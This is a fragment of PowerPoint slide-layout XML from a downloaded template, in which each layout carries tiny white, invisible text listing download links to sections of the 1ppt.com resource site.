              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout191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91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91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91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9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92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92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92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92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92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92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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout192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92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92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92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9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93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93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93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93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93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93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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout193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93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93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93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9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94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94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94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94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94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94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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
